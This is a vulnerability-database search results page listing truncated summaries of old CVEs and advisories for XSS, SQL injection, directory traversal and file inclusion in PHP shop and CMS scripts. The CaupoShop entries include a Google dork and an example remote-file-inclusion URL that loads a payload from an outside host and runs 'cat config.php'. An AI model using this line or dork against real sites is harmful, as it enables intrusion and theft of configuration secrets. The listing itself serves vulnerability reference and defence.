7210 matches found
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php; or the command parameter to index.php in (2) the default action for the home page, (3) a currencies action, or (4) a basket action...
CVE-2007-5719
SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...
CVE-2007-5725
Multiple cross-site scripting (XSS) vulnerabilities in Smart-Shop allow remote attackers to inject arbitrary web script or HTML via (1) the email parameter to index.php; or the command parameter to index.php in (2) the default action for the home page, (3) a currencies action, or (4) a basket action...
SQL injection
SQL injection vulnerability in bbfuncsearch.php in miniBB 2.1 allows remote attackers to execute arbitrary SQL commands via the table parameter to index.php...
CVE-2007-5692
Multiple cross-site scripting (XSS) vulnerabilities in SiteBar 3.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to integrator.php; (2) the token parameter in a New Password action, (3) the nidacl parameter in a Folder Properties action, or (4) the uid parameter...
cauposhop-rfi.txt
dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...
Smart-Shop - index.php Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/26232/info SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabiliti...
CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability
No description provided by source. dork:allinurl:index.php?action= basket sid vuln:index.php?action= examples: http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php author:[email protected] site:http://mozi.rootmybox.org support:http://darkc0de.com & whoami...
CVE-2007-5684
Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in (1) errorhandlerfile and (2) localphp parameters to (a) tiki-index.php, or (3) encoded "..%2F" sequences in the implanguage parameter to...
Directory traversal
Multiple directory traversal vulnerabilities in TikiWiki 1.9.8.1 and earlier allow remote attackers to include and execute arbitrary files via an absolute pathname in (1) errorhandlerfile and (2) localphp parameters to (a) tiki-index.php, or (3) encoded "..%2F" sequences in the implanguage parameter to...
CVE-2003-1499
CVE-2003-1499 : A directory traversal flaw in Bytehoard 0.7’s index.php allows remote attackers to read arbitrary files by supplying a .. in the infolder parameter. The NVD entry lists CVSS v2 base metrics: AV:N/AC:L/Au:N/C:N/I:N/A:P with a base score of 5.0 (Medium) and network attack vector; ex...
Directory traversal
Directory traversal vulnerability in system.php in ReloadCMS 1.2.7 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module parameter to index.php...
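InstaGuide Weather Index.PHP File Inclusion Vulnerability
InstaGuide Weather is a PHP-based web application. InstaGuide Weather does not properly filter user-submitted input, and a remote attacker can exploit the vulnerability to view the contents of system files with the privileges of the web server. The problem is that the 'Index.PHP' script does not filter the user-submitted 'PageName' parameter; submitting an application file as the parameter can lead to disclosure of sensitive information. InstaGuide Weathe No solution is currently available: http://www.instaguide.com/index.php?PageName=products http://www.example.com/index.php?PageName=Local File%00...
DM CMS Index.PHP SQL Injection Vulnerability
DM CMS is a PHP-based web application. DM CMS does not properly filter user-submitted URI data, and a remote attacker can exploit the vulnerability to carry out SQL attacks, obtaining sensitive information or manipulating the database. The problem is that the 'index.php' script does not filter the user-submitted 'id' parameter; submitting a malicious SQL query as the parameter data can change the original SQL logic, allowing the attacker to obtain sensitive information or manipulate the database. DMCMS 0.7 No detailed solution is currently available: http://sourceforge.net/projects/dmcms/ http://www.example.com/index.php?page=media&id=SQL INJECTION CODE GOES HE...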
deeemm CMS (dmcms) 0.7 - index.php SQL Injection
source: https://www.securityfocus.com/bid/26169/info DMCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
visolfi.txt
Title : VISO apps Local File Inclusion Vulnerability Description : VISO apps is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. Software: : http://www.viventus.no/visoapps/ Author : d3hydr8 Homepage : http://www.darkc0de.com Original Post :...
CVE-2003-1412
CVE-2003-1412 affects GOsa (GOnicus System Administrator) 1.0. It is a PHP remote file inclusion vulnerability where the plugin parameter in index.php can be controlled to include arbitrary PHP code from several paths: 3fax/1blocklists/index.php, 6departamentadmin/index.php, 5terminals/index.php,...
CVE-2002-2277
PortailPHP 0.99 contains an SQL injection in mod_search/index.php. The vulnerability allows remote attackers to inject SQL via (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin, potentially affecting confidentiality, integrity, and availability as i...
CVE-2002-2277
SQL injection vulnerability in mod_search/index.php in PortailPHP 0.99 allows remote attackers to execute arbitrary SQL commands via the (1) $rech, (2) $BD_Tab_docs, (3) $BD_Tab_file, (4) $BD_Tab_liens, (5) $BD_Tab_faq, or (6) $chemin variables...